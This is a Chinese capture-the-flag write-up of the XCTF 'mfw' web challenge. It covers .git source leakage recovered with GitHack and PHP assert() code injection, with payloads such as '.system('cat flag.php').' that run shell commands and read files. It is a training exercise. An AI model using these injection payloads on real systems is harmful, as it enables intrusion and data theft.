首页 > 其他分享 >XCTF-mfw

XCTF-mfw

时间:2023-11-28 09:12:22浏览次数:39  
标签:git die XCTF assert file mfw php page

访问主页

经过发现page传参应该是一个文件包含页面,不过没有加后缀名,应该是在服务端会自动给我们加上
试了文件包含的data://协议,还有%00阶段没有成功,使用dirb进行目录爆破

得到.git目录,应该是.git泄露,使用GitHack获取

python2 GitHack.py http://61.147.171.105:60868/.git


得到index.phptemplates,得到index.php源码

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

上述中有一个危险函数assert(),他会将函数中的字符串当做PHP代码执行,而我们可以直接传入$file,就像闭合sql语句一样闭合该PHP代码

根据第一条

assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

pyaload为'.system('ls').',尝试执行使用system()函数调用系统命令ls

执行成功,尝试继续执行获取flag

?page='.system('cat flag.php').'


这里失败了,因为下方还有一段php代码

assert("file_exists('$file')") or die("That file doesn't exist!");

需要同时绕过这两条才可以执行命令,经过一番测试,传入payload


标签:git,die,XCTF,assert,file,mfw,php,page
From: https://www.cnblogs.com/Junglezt/p/17861050.html

相关文章

  • XCTF-web2
    访问查看得到下方源码<?php$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws";functionencode($str){$_o=strrev($str);//echo$_o;for($_0=0;$_0<strlen($_o);$_0++){$_c=substr($_o,$_0,1);......
  • Misc_XCTF_WriteUp | stegano
    题目提示:菜狗收到了图后很开心,玩起了pdf提交格式为flag{xxx},解密字符需小写题目:分析首先查看文件属性,没有发现异常。查看十六进制文件,文件头正常。在文件中搜索“flag”文本,找到一串base64编码:解码后发现不是flag:同时在这个假flag前发现“Producer(findmr.m......
  • XCTF-Web_php_unserialize
    访问查看是一道经典的反序列化题目,尝试解题,大概一下脚本,需要传入var进行反序列化php代码会先将var传入的值进行base64解码,然后进行perg_match()正则匹配判断,如果匹配成立就执行die()方法终止脚本运行使用unserialize()方法反序列化我们传入的值__wakeup()在反序列化时候执......
  • Misc_XCTF_WriteUp | 坚持60s
    题目(一个jar文件分析运行了一下,是一个躲绿帽的游戏,掐点过了60s,什么也没有:……可恶,被骗了人生的60s(握拳)用010Editor打开,发现是zip压缩包的文件头(查了一下好像jar文件本身就是压缩文件),解压缩得到文件源码:检查完image文件夹中的所有图片素材,没有找到flag。将......
  • Crypto_XCTF_WriteUp | 你猜猜
    题目提示:我们刚刚拦截了,敌军的文件传输获取一份机密文件,请君速速破解。题目:504B03040A0001080000626D0A49F4B5091F1E0000001200000008000000666C61672E7478746C9F170D35D0A45826A03E161FB96870EDDFC7C89A11862F9199B4CD78E7504B01023F000A0001080000626D0A49F4B5091F1E0000001......
  • Crypto_XCTF_WriteUp | easychallenge
    题目一个pyc文件(……不知道怎么形容分析用txt格式打开是一串半人半鱼的……一串夹着一点点编程语言的乱码,必应了一下是python运行后生成的字节码文件。直接运行出现报错:提示pyc文件中的magicnumber错误,可能是python版本不匹配或者文件损坏导致。于是安装uncom......
  • Crypto_XCTF_WriteUp | 轮转机加密
    题目提示:你俩继续往前走,来到了前面的下一个关卡,这个铺面墙上写了好多奇奇怪怪的英文字母,排列的的整整齐齐,店面前面还有一个大大的类似于土耳其旋转烤肉的架子,上面一圈圈的也刻着很多英文字母,你是一个小历史迷,对于二战时候的历史刚好特别熟悉,一拍大腿:“嗨呀!我知道是什么东西了......
  • Web_XCTF_WriteUp | pure_color
    题目分析给了个纯白png图片,看来是图片隐写题。按照隐写题的解题思路,依次进行了:打开图片属性寻找flag:未果用010Editor打开文件代码寻找flag及查看文件的开头/结束标志:没有找到flag,标志也分别是png文件的开头/结束标志,没有异常因为这两天重装了虚拟机,所以先用......
  • xctf ics-05
     进来之后是一个工控云管理系统,左边一堆只有设备维护中心有跳转。  此时的url也发生了改变 没头绪,到处瞎点试一试 发现点了左上角的设备维护中心之后有变化,并且参数会显示出来。  修改参数发现始终会显示在页面下方 使用index.php,返回ok 尝试读取index.......
  • XCTF-Final Flappy-Bird-Cheat题目复现
    引言这是一道有关Magisk模块的题目,虽然一直在用Magisk,但是对其模块作弊机制还不是很了解,之前比赛的时候没做出来(之前没恢复OpenSSL的符号,看起来很难看放弃了),有时间翻出来再看看。难点在于这道题目是采取静态分析的手段看的,暂时没找到什么办法对模块内的so文件进行动调和Hook,之后......